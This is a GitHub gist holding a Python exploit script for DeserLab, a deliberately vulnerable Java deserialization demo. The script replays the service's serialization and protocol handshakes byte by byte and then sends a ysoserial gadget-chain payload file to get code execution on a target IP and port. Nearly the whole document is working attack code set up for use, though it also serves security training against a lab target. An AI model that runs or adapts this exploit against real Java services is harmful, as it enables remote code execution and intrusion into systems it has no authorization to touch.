Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
References
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
https://www.youtube.com/watch?v=VviY3O-euVQ
http://wouter.coekaerts.be/2015/annotationinvocationhandler
http://www.baeldung.com/java-dynamic-proxies
https://stackoverflow.com/questions/37068982/how-to-execute-shell-command-with-parameters-in-groovy
https://www.sourceclear.com/registry/security/remote-code-execution-through-object-deserialization/java/sid-1710/technical
"""
import sys
import socket
import argparse
import logging
import struct
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
class deser:
def __init__(self,tip,tport):
self.targetip = tip
self.targetport = int(tport)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connect(self):
self.s.connect((self.targetip, self.targetport))
def javaserial(self):
blob = '\xac\xed\x00\x05'
self.s.sendall(blob)
logging.debug("server javaserial resp: %s" % self.s.recv(4).encode('hex'))
def protohello(self):
header = self.s.recv(2)
datalength = int(struct.unpack('B',header[1])[0])
logging.debug("server proto hello %s" % self.s.recv(datalength).encode('hex'))
blob = '\x77\x04'
blob2 = '\xf0\x00\xba\xaa'
self.s.sendall(blob)
self.s.sendall(blob2)
def protoversion(self):
header = self.s.recv(2)
datalength = int(struct.unpack('B',header[1])[0])
logging.debug("server version %s" % self.s.recv(datalength).encode('hex'))
blob = '\x77\x02'
blob2 = '\x01\x01'
self.s.sendall(blob)
self.s.sendall(blob2)
def clientname(self):
blob = '\x77\x09' #depends on username + type length
blob2 = '\x00\x07\x74\x65\x73\x74\x69\x6e\x67'
self.s.sendall(blob)
self.s.sendall(blob2)
def exploit(self, payload_file):
"""
Normally this is where the HashRequest object is send
instead we send a ysoserial payload, skipping the first 4 bytes
"""
payload = ''
with open(payload_file, 'rb') as content_file:
payload = content_file.read()
self.s.sendall(payload[4:])
logging.debug('after exploit: %s' % self.s.recv(1024))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit for DeserLab',epilog='https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/')
parser.add_argument('targetip',help='target ip to exploit')
parser.add_argument('targetport',help='target port to exploit')
parser.add_argument('payloadfile',help='file with the ysoserial payload')
myargs = parser.parse_args()
logging.debug("target %s" % myargs.targetip)
logging.debug("port %s" % myargs.targetport)
mydeser = deser(myargs.targetip, myargs.targetport)
logging.info("Connecting")
mydeser.connect()
logging.info("java serialization handshake")
mydeser.javaserial()
logging.info("protocol specific handshake")
mydeser.protohello()
logging.info("protocol specific version handshake")
mydeser.protoversion()
logging.info("sending name of connected client")
mydeser.clientname()
logging.info("exploiting")
mydeser.exploit(myargs.payloadfile)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.